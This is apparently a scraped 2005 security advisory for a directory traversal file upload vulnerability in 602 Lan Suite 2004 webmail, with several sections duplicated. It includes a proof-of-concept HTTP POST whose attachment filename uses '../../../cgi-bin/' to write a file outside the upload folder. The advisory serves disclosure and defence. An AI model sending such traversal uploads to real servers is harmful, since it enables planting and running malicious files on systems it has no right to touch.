Software602 602 Lan Suite Arbitrary File Upload Vulnerability
BID:12495
Info
Software602 602 Lan Suite Arbitrary File Upload Vulnerability
| Bugtraq ID: | 12495 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 08 2005 12:00AM |
| Updated: | Feb 08 2005 12:00AM |
| Credit: | Discovery of this vulnerability is credited to Tan Chew Keong. |
| Vulnerable: |
Software602 602Pro LAN SUITE 2004 2004.0.04.1221 |
| Not Vulnerable: | |
Discussion
Software602 602 Lan Suite Arbitrary File Upload Vulnerability
602 Lan Suite 2004 is reportedly affected by a vulnerability regarding the uploading of file attachments. This issue is due to the application failing to properly sanitize the names of file attachments before upload. A malicious user could exploit this vulnerability using directory traversal attacks to upload a file to an arbitrary location accessible by the affected server.
This vulnerability could lead to the execution of a malicious file on the server hosting the application.
602 Lan Suite 2004 version 2004.0.04.1221 is reportedly vulnerable; other versions may also be affected.
602 Lan Suite 2004 is reportedly affected by a vulnerability regarding the uploading of file attachments. This issue is due to the application failing to properly sanitize the names of file attachments before upload. A malicious user could exploit this vulnerability using directory traversal attacks to upload a file to an arbitrary location accessible by the affected server.
This vulnerability could lead to the execution of a malicious file on the server hosting the application.
602 Lan Suite 2004 version 2004.0.04.1221 is reportedly vulnerable; other versions may also be affected.
Exploit / POC
Software602 602 Lan Suite Arbitrary File Upload Vulnerability
No exploit is required and the following proof of concept demonstrating a malicious file upload request is available:
POST /mail HTTP/1.0
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------287661860715985
Content-length: 540
-----------------------------287661860715985
Content-Disposition: form-data; name="U"
6E13745843714258F86310B04D7
-----------------------------287661860715985
Content-Disposition: form-data; name="A"
ATTACHMENTS
-----------------------------287661860715985
Content-Disposition: form-data; name="FILENAME"; filename="../../../cgi-bin/a.txt"
Content-Type: text/plain
Test File
-----------------------------287661860715985
Content-Disposition: form-data; name="ATTACH"
Attach
-----------------------------287661860715985--
No exploit is required and the following proof of concept demonstrating a malicious file upload request is available:
POST /mail HTTP/1.0
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------287661860715985
Content-length: 540
-----------------------------287661860715985
Content-Disposition: form-data; name="U"
6E13745843714258F86310B04D7
-----------------------------287661860715985
Content-Disposition: form-data; name="A"
ATTACHMENTS
-----------------------------287661860715985
Content-Disposition: form-data; name="FILENAME"; filename="../../../cgi-bin/a.txt"
Content-Type: text/plain
Test File
-----------------------------287661860715985
Content-Disposition: form-data; name="ATTACH"
Attach
-----------------------------287661860715985--
Solution / Fix
Software602 602 Lan Suite Arbitrary File Upload Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Software602 602 Lan Suite Arbitrary File Upload Vulnerability
References:
References:
- 602LAN SUITE Web Mail Vulnerability Allows File Upload to Arbitrary Directories (SIG^2 Vulnerability Research)
- 602Pro LAN SUITE Product Page (Software602)